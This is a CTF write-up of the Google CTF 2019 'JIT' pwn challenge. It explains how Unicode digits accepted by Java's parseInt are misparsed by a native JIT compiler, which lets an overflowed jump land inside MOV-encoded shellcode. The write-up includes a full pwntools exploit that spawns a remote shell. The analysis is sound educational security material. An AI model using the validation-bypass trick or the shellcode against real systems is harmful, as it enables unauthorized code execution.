JIT - Google CTF Quals 2019
We read on the internet that Java is slow so we came up with the solution to speed up some computations!
nc jit.ctfcompetition.com 1337
283 Pts, 23 solves, pwn
We are provided with two files FancyJIT.java and compiler.c for this challenge, and from the description and a quick look we can see that the FancyJIT class reads in opcodes line by line, performs some validation and then sends it to a compiler via a nativly built shared library. The compiler then parses the program and converts it into machine code then executes it, returning the result to the java program.
In order to compile FancyJIT we first need to downlaod the jna library, then we can add it to the classpath and compile class with javac -cp ./jna-5.3.1.jar FancyJIT.java
. The compiler can also be compiled with gcc compiler.c -shared -fPIC -o linux-x86-64/libcompiler.so
or as a normal program for testing with gcc compiler.c -o compiler
There are only 11 opcodes which are all fairly basic, like adding and storing, but there are also compare and jump operations for performing loops. The compiler maps two random pages, one for the executable text section and another for the data section which is stored into r12. All of the opcodes for accessing memory generate code to use this register, for example LDR will generatemov eax, [r12+imm8]
The load and store operations seemed fairly safe as there didn’t seem to be anyway to access data outside of the page. My next idea was to try jump to the middle of an instruction, as the MOV instruction allowed us to use a 32 bit value which would allow for 4 bytes of assembly. If we used the last two bytes to jmp foward then we could chain as much asm together as we needed, so long as they were one or two byte instructions.
The compiler code that generates the jump is the following:
out[4] = (intbracket(cmd + 4) - instrno) * 5 - 5; // jne imm8
So JMP(0) would create a jump to offset 0 from the page and JMP(1) to offset 5. I realised that result was being put into out[4]
which is only one byte, meaning we can overflow it to potentially remove the 5 byte alignment. For example if we use JMP(-51) when we are at instrno
20 we get (-51-20)*5-5 == -360
which then gets truncated to -104, resulting in a jump to offset 1.
The jump can now be used to go to the middle of an instruction, for example we can use MOV to encode our payload in two byte increments:
value = u32(asm("mov al, 10\n jmp $+3"))
payload = "MOV(A, {})".format(value)
assert payload == 'MOV(A, 32180912)'
I then tried to run it through FancyJIT instead of straight in the compiler but was greeted with Sorry, your program has some errors. Looking at the validation code for MOV and JMP we see that there are some checks on what the agument is allowed to be:
// JMP
if (instr.arg < 0 || instr.arg >= program.length || Math.abs(i - instr.arg) > 20) {
// MOV
if (instr.arg < 0 || instr.arg > 99999) {
return false;
So both our MOV and JMP instructions fail the validation as they are outside of the allowed range. I stared looking at ways to bypass the validation, but was not able to find any and none of the instuctions had incorrect validation from what I could see.
I then started to look for differences between how FancyJIT parsed the program to how the compiler parsed it. The function that read the argument value stood out as a potential difference:
// FancyJIT
Integer.parseInt(cmd.substring(7, cmd.length() - 1))));
// compiler
int intbracket(const char* s) {
int mul = 1;
if (*s == '-' || *s == '+') {
mul = (*s == '-') ? -1 : 1;
int res = 0;
for (; *s != ')'; s++) {
res = res * 10 + *s - '0';
return res * mul;
intbracket(cmd + 7);
If we could somehow send in characters other than 0-9 then the compilers intbracket method would be incorrect, and as there is no length check we could also overflow the int result as many times as needed. I tried a few different things like 0x1234, 1e123 but Integer.parseInt
always threw an exception. I then went and had a look at the source for parseInt which lead me to Character.isDigit. This had some very nice javadoc giving us a clue as to how we can get other characters through the validation:
Some Unicode character ranges that contain digits:
'\u0030' through '\u0039', ISO-LATIN-1 digits ('0' through '9')
'\u0660' through '\u0669', Arabic-Indic digits
'\u06F0' through '\u06F9', Extended Arabic-Indic digits
'\u0966' through '\u096F', Devanagari digits
'\uFF10' through '\uFF19', Fullwidth digits
Many other character ranges contain digits as well.
Writing a quick snippet in java to see what counts as a 0 gives us a bunch of results:
for (int i = 0; i < 0x10000; i++) {
if (Character.digit(i, 10) == 0) {
// 0x30, 0x660, 0x6f0, 0x7c0, 0x966, 0x9e6, 0xa66, 0xae6, 0xb66, 0xbe6, 0xc66, 0xce6, 0xd66, 0xe50, 0xed0, 0xf20, 0x1040, 0x1090, 0x17e0, 0x1810, 0x1946, 0x19d0, 0x1a80, 0x1a90, 0x1b50, 0x1bb0, 0x1c40, 0x1c50, 0xa620, 0xa8d0, 0xa900, 0xa9d0, 0xaa50, 0xabf0, 0xff10
Using these we should be able to craft a string that is correctly parsed by parseInt and that also passes the validaation, but then produces a different number in the compiler!
As this was a CTF, I just wrote a quick and dirty function to bruteforce values that the compiler would see as our target number but that FancyJIT would see as less than 100000. This was done by generating random combination of valid utf8 zeros until a number that was within 100000 of our target, then appending the last 5 digits to make the correct number.
from ctypes import *
import random
compiler = CDLL("linux-x86-64/libcompiler.so")
valid_zeroes = [0x30, 0x660, 0x6f0, 0x7c0, 0x966, 0x9e6, 0xa66, 0xae6, 0xb66, 0xbe6, 0xc66, 0xce6, 0xd66, 0xe50, 0xed0, 0xf20, 0x1040, 0x1090,
0x17e0, 0x1810, 0x1946, 0x19d0, 0x1a80, 0x1a90, 0x1b50, 0x1bb0, 0x1c40, 0x1c50, 0xa620, 0xa8d0, 0xa900, 0xa9d0, 0xaa50, 0xabf0, 0xff10]
encoded_zeros = map(lambda c: unichr(c).encode("utf8"), valid_zeroes)
def get_num(goal):
print goal
base = goal / 100000 * 100000
while True:
sample = []
for _ in range(random.randrange(1, 10)):
payload = "{}00000)".format("".join(sample))
res = compiler.intbracket(payload)
if res >= base and res <= goal:
difference = goal % 100000 - (res - base)
payload = "{}{:05d}".format("".join(sample), difference)
assert compiler.intbracket(payload + ")") == goal
return payload
The next step was to generate a valid argument for jump that would equal -51 in the compiler. The issue here was that the the number had to be within 20 of the current instruction pointer to pass the validation, but we could only have 23 instructions for the value of -51 to still jump to the correct place in the middle of our first instruction. I changed the above function from 100000 to 1000 and set it running.
The values I’d picked weren’t really set in stone, so I started changing the generator to search for other values that could be used with some padding and jumping around, but then one was found ᥆᱀০୦০႐꘠꘠੦0᥆꘠꘠୦013
which is 13 when validating and -51 when compiling, perfect!
The final stage was putting it all together and create the shellcode. I decided to do a simple mprotect and read as the first stage, then I could just send through a second stage payload with the remaining shellcode.
After a bit of time calculating random numbers, we get a shell and then the flag CTF{8röther_m4y_1_h4v3_söm3_nümb3r5}
Full exploit script
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import logging
from pwn import *
from ctypes import *
import random
compiler = CDLL("linux-x86-64/libcompiler.so")
valid_zeroes = [0x30, 0x660, 0x6f0, 0x7c0, 0x966, 0x9e6, 0xa66, 0xae6, 0xb66, 0xbe6, 0xc66, 0xce6, 0xd66, 0xe50, 0xed0, 0xf20, 0x1040, 0x1090,
0x17e0, 0x1810, 0x1946, 0x19d0, 0x1a80, 0x1a90, 0x1b50, 0x1bb0, 0x1c40, 0x1c50, 0xa620, 0xa8d0, 0xa900, 0xa9d0, 0xaa50, 0xabf0, 0xff10]
encoded_zeros = map(lambda c: unichr(c).encode("utf8"), valid_zeroes)
def get_num(goal):
print goal
base = goal / 100000 * 100000
while True:
sample = []
for _ in range(random.randrange(1, 10)):
payload = "{}00000)".format("".join(sample))
res = compiler.intbracket(payload)
if res >= base and res <= goal:
difference = goal % 100000 - (res - base)
payload = "{}{:05d}".format("".join(sample), difference)
assert compiler.intbracket(payload + ")") == goal
return payload
def exploit():
# mprotect(text, 0x1000, 7)
# read(0, text, 0x1000)
code = asm("""
mov esi, eax
xor eax, eax
mov al, 10
xor edx, edx
mov dl, 7
push rdi
push rsi
pop rdx
pop rsi
xor eax, eax
push rax
pop rdi
jmp = asm("jmp $+3")
payload = ""
for i in range(0, len(code), 2):
num = u32(code[i:i+2]+jmp)
payload += "MOV(A, {})\n".format(get_num(num))
payload += "MOV(A, 4096)\n"
payload += "JMP(᥆᱀০୦০႐꘠꘠੦0᥆꘠꘠୦013)\n"
payload += "RET()\n"
p.sendlineafter("result:", payload)
p2 = "A"*53 + asm(shellcraft.sh())
p.send(p2.ljust(0x1000, "\x00"))
# CTF{8röther_m4y_1_h4v3_söm3_nümb3r5}
if __name__ == "__main__":
context.terminal = ["tmux", "sp", "-h"]
context.arch = "amd64"
if len(sys.argv) > 1:
p = remote("jit.ctfcompetition.com", 1337)
p = process("java -cp ./jna-5.3.1.jar:. FancyJIT",
stdin=PTY, stdout=PTY, shell=True)